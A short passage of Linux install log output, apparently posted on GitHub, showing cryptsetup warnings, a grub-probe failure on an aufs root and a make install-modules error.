cryptsetup: WARNING: failed to detect canonical device of aufs
cryptsetup: WARNING: could not determine root device from /etc/fstab
Will now run update-grub to ensure grub will find the new initramfs ...
/usr/sbin/grub-probe: error: cannot stat `aufs'.
make: *** [install-modules] Error 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment